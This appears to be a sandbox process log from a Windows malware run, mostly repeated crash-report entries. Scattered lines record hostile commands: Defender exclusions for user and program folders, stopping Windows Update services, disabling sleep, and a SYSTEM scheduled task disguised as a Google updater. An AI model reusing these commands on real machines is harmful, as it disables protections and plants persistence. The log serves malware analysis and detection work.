C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1424
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1564
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1328
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1620
C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1564
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1684
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1660
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5892 -ip 5892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 5208
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn "csrss" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn "ScheduledUpdate" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1756
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1680
C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1648
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1532
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1876
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1936
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1964
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Program Files (x86)\ClocX\ClocX.exe
"C:\Program Files (x86)\ClocX\ClocX.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1924
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2040
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
